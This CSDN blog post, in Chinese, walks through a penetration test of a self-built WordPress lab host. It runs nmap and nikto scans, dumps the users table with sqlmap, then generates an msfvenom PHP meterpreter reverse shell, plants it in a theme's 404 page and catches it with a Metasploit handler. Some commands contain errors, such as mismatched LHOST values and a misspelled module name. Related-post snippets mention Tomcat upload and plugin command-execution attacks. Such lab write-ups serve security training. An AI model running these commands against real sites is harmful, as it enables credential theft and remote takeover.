Wordpress网站渗透测试(进阶详细思路)

已于 2023-05-11 09:15:02 修改
阅读量6.4k 收藏 40
点赞数 1
分类专栏: 网络安全 web web渗透测试 文章标签: 安全 web安全 php
于 2022-05-26 20:18:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51957047/article/details/124985217
版权

wordpress网站渗透测试

WordPress是一款免费开源的内容管理系统(CMS)

WordPress官方站点
英文站点:https://wordpress.org
中文站点:https://cn.wordpress.org/

WordPress主要用于搭建网站,包括博客和其它各种类型的网站。它有非常多不同风格的主题来呈现不同的外观,通过使用不同的插件实现千变万化的功能,可以使用WordPress来创建不同类型的网站。

WordPress缺点
1、插件虽多,但是不能安装太多插件,否则会拖累网站速度和降低用户体验;
2、服务器空间选择自由较小;
3、静态化较差,最多只能生成首页和文章页静态页面,所以只能对整站实现伪静态化;
4、wordpress适合中小型的站点,轻量级的架构决定它不适合做大型站点;

wordpress渗透过程

注意:环境本人自己搭建

1.信息收集
2.网站爆破
3.上传木马
4.设置监听

网站ip:172.16.1.107

信息收集

nmap -sV -p- 172.16.1.107 探测目标靶机的服务版本信息

在这里插入图片描述
发现靶机开启22,80,443,8080端口
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
对80端口进行深入挖掘
nikto -host http://172.16.1.107对服务器80端口进行扫描
发现logig.php登录页面
在这里插入图片描述
在这里插入图片描述

网站爆破

使用sqlmap对网站进行暴力破解
sqlmap -u “http://172.16.1.107/login.php” --forms --level 3

在这里插入图片描述
sqlmap -u “http://172.16.1.107/login.php” --forms --level 3 --dbs 查看数据库
在这里插入图片描述

sqlmap -u “http://172.16.1.107/login.php” --forms --level 3 -D wordpress8080 -T users -tables
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

sqlmap -u “http://172.16.1.107/login.php” --forms --level 3 -D wordpress8080 -T users --dump

在这里插入图片描述
在这里插入图片描述
登录http://172.16.1.107:8080/wordpress/wp-login.php
在这里插入图片描述

上传木马

登录网页后找到插件,404页面
在这里插入图片描述
msfvenom -p php/meterpreter/reverse_tcp LHOST=172.16.1.107 LPORT=4448 -f raw > likes.php 生成木马

在这里插入图片描述
将木马上传到404页面中,刷新页面

在这里插入图片描述
在这里插入图片描述

设置监听

use exploit/multi/hander 使用监听模块
set payload php/meterpreter/reverse_tcp 设置payload
show options
set LHOST 172.16.1.134
set LPORT 4448

在这里插入图片描述

访问http://172.16.1.107/wordpress/404.php建立会连

在这里插入图片描述
成功入侵靶机

Eglike
关注
  • 1
    点赞
  • 40
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
主机渗透——CRC_3_PENTEST_2_WORDPRESS
B_roin的博客
02-15 1212
1. 该题使用的是wordpress框架,可以利用WPScan进行扫描 注意:带着token才能扫描出漏洞 WPScan的使用教程可以参考:https://blog.csdn.net/guo15890025019/article/details/118548932 在这里利用mailpress插件的命令执行漏洞,越权执行命令 2. 利用漏洞 http:// IP地址 /wp-content/plugins/mailpress/mp-includes/action.php 利用hackbar或者burp su
Tomcat任意文件上传漏洞(CVE-2017-12615)
锋刃科技的博客
06-12 1326
1、简介 Tomcat 是常见的Web 容器, 用户量非常巨大 2、影响版本 Tomcat 7.0.0 - 7.0.81 3. 漏洞指纹 tomcat 8009 ajp \x04\x01\xf4\x00\x15 4、环境搭建 这里我们用vulhub和docker组合搭建环境 cd vulhub/tomcat/CVE-2017-12615 docker-compose build docker-compose up -d 转存失败重新上传取消 ...
记录一次wordpress的渗透思路
qq_61611948的博客
12-01 102
wpscan --url http://192.168.10.140/wordpress -e u 用户名的枚举 发现michael steven 但不是后台管理员的密码。找到许多的用户 进行筛选 打开linux 或者kali /etc/passwd 对比 发现像bin用户后面有nologin的字样----不能登陆舍去。nmap 192.168.10.140 -v --script=brute -p22 指定22进行暴力破解 发现很多用户的枚举信息。
2024年网络安全最新干货 Wordpress网站渗透方法指南_wordpress渗透(1)
最新发布
2401_84302628的博客
05-01 1075
feed=rss2author=1或者​​​​​​​或者​​​​​​​## 注册启用。
WordPress网站进行渗透测试 – 详解
zhalang8324的博客
01-13 5222
WordPress是一个专注于PHP和MySQL的免费在线开源内容托管系统。这是一个功能强大且使用最多的博客工具。 由于WordPress使用过程中出现了太多的错误,所以需要提高安全性。WordPress渗透测试对于发现漏洞并保护您的WordPress博客非常重要。 安全研究人员丹尼尔·西德说,在2016年,至少有15769个甚至更多的WordPress网站已经被入侵。 根据Su
干货 | Wordpress网站渗透方法指南
leah126的博客
05-03 2267
如果您遇到使用 WordPress网站,您会怎么做,渗透思路安全检测思路
python渗透测试入门之wordpress登录
ailx10
06-13 638
近期收到了电子工业出版社赠送的一本网络安全书籍《python黑帽子》,书中一共24个实验,今天复现第14个实验(密码猜测),我的测试环境是mbp电脑+同事的wordpress站点+conda开发环境。有一说一,弱口令是脆弱的,但是复杂密码根本猜不出来,需要分析站点POST请求和响应是值得肯定的,但是等着耗着CPU和网络是不可取的~1、查阅wordpress站点登录页面源代码首先GET请求,接受返回...
【网络安全网站站点渗透实战
jazzz98的博客
04-10 1499
【网络安全】记一次网站站点渗透
网站渗透思路(小白专看,大佬绕道)
weixin_48477703的博客
06-12 1万+
渗透测试大体可以分为六大步 1. 信息收集 2.漏洞挖掘 3.漏洞利用 4.提升权限 5.清除测试数据 6. 总结归纳输出报告并提出修复建议 首先在获取书面授权的情况下,才可以进行渗透测试,提前询问有没有敏感操作等,首先进行网站的信息收集 ...
web渗透测试基本步骤
weixin_34313182的博客
03-05 1342
基本常见步骤: 一 、信息收集 要检测一个站首先应先收集信息如whois信息、网站真实IP、旁注、C段网站、服务器系统版本、容器版本、程序版本、数据库类型、二级域名、防火墙、维护者信息有哪些等等 二、收集目标站注册人邮箱 1.用社工库里看看有没有泄露密码,然后尝试用泄露的密码进行登录后台。 2.用邮箱做关键词,丢进搜索引擎。 3.利用搜索到的关联信息找出其他邮进而得到常...
wordpress网站转移到本地运行测试的方法
10-20
主要为大家详细介绍了wordpress网站转移到本地运行测试的方法,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
WPCracker:WordPress 渗透测试工具
05-29
WP破解器 适用于 Windows 和 Linux 的 WordPress 用户枚举和登录 Brute Force 工具 使用“蛮力”工具,您可以控制要执行的攻击的攻击程度,这会影响所需的攻击时间。 该工具可以调整线程数量以及每次测试每个线程的密码批次大小。 但是,过多的攻击力会导致受害者的服务器变慢。 例如,当我攻击我的本地服务器时,当我使用程序预设的线程数(12)和批处理大小(1000)时,大约需要两天时间才能通过rockyou.txt(14,341,564个唯一密码) )。 在本文中,“受害者”是指 pentest 实验室中被攻击的 WordPress 站点。 攻击您无权访问的 WordPress 站点可能是非法的。 使用: 用户枚举 . \W PCracker.exe --enum -u < Url> -o < Output
Learn-WordPress:WordPress进阶之路
05-18
WordPress进阶之路》这是一本聚集众多人的心血产生的书,所有内容面向互联网免费开放。发起原因WordPress无论在国外还是国内一直是一个比较火的博客软件,或者说是一个CMS软件。有关WordPress的教程在网上是多之...
CMSmap - WordPress Shell
03-24
如果您是一名渗透测试工程师或安全评估人员,这个程序将成为您不可或缺的工具之一。同时,使用CMSmap - WordPress Shell还需要有一定的安全知识和经验,因此请在合法授权的情况下使用,谨慎使用。
搭建WordPress渗透测试靶机
D-R0s1的博客
01-24 3367
        想要提高自己在实战中渗透的技术,就要在靶机中不断地训练,今天和大家一起搭建一个WordPress网站的渗透环境,文章很基础,希望可以帮到像我一样的技术小白。 第一步:         我们需要在https://www.turnkeylinux.org/wordpress中下载镜像,因为网站是全英文的,所以在这里我给大家附上几张图,大家根据图示就可以轻松的找到下载的地方。 ...
wordpress漏洞扫描工具使用(wpscan实战)
天元喜羊羊的博客
08-07 1万+
http://www.2cto.com/Article/201212/178631.html BT5 WPSCAN 工具使用 首先看下Wpscan 工具目录 /pentest/web/wpscan 首先安装终端类型 apt-get install libcurl4-gnutls-dev gem install –user-install typhoeus gem insta
python渗透测试入门之wordpress文件隐患
ailx10
06-13 288
近期收到了电子工业出版社赠送的一本网络安全书籍《python黑帽子》,书中一共24个实验,今天复现第12个实验(wordpress文件隐患),我的测试环境是mbp电脑+同事的wordpress在线站点+conda开发环境。wordpress是知名博客网站,如果安装之后没有删除一些配置文件,容易导致网站安全隐患,通过对比在线wordpress和本地wordpress之间的相同文件,得到在线wordp...
小白日记1:kali环境Wpscan渗透Wordpress
ZiXuanFY的博客
09-05 1万+
一、什么是Wpscan?什么是Wordpres?     1.Wpscan      WPScan是一款针对wwordpress安全扫描软件;可以扫描出wordpress的版本,主题,插件,后台用户以及爆破后台用户密码等。     2.Wordpress      WordPress是一种使用PHP语言和MySQL数据库开发的博客平台,用户可以在支持PHP和MySQL数据
wordpress 漏洞_轻松发现WordPress漏洞
热门推荐
culi4814的博客
08-24 1万+
wordpress 漏洞As a developer or design professional, one of the biggest benefits of building your sites on WordPress is that in most cases you are building your code on a proven platform which has been ...
如何用wordpress创建一个网站详细步骤
05-29
以下是使用 WordPress 创建网站详细步骤: 1. 下载 WordPress。可以从 WordPress 的官方网站下载到最新版本的 WordPress。 2. 安装 WordPress。将下载的 WordPress 文件解压缩到你的网站根目录中。如果你是在本地电脑上创建网站,可以将 WordPress 解压缩到 XAMPP 的 htdocs 文件夹中。 3. 创建数据库。在 MySQL 中创建一个新的数据库,并记下该数据库的名称、用户名和密码。 4. 运行 WordPress 安装向导。在浏览器中输入你的网站地址,将会自动跳转到 WordPress 的安装页面。按照页面上的指导,输入数据库名称、用户名和密码等信息,以完成 WordPress 的安装。 5. 登录 WordPress 后台。完成安装后,可以在浏览器中输入你的网站地址/wp-admin/,进入 WordPress 的后台管理界面。 6. 定制主题和插件。在 WordPress 后台中,可以选择主题,定制网站的外观和布局。你还可以安装和使用各种插件,扩展 WordPress 的功能和特性。 7. 创建内容。在 WordPress 后台中,可以创建文章、页面、分类和标签等内容,以便在网站中展示和分享。你可以添加图片、视频和其他媒体文件,使你的网站更加生动和多样化。 8. 访问你的网站。在浏览器中输入你的网站地址,就可以访问你的 WordPress 网站了。 以上是使用 WordPress 创建网站的基本步骤。如果你需要更加详细的指导,可以参考 WordPress 的官方文档或者在线教程。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Eglike

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值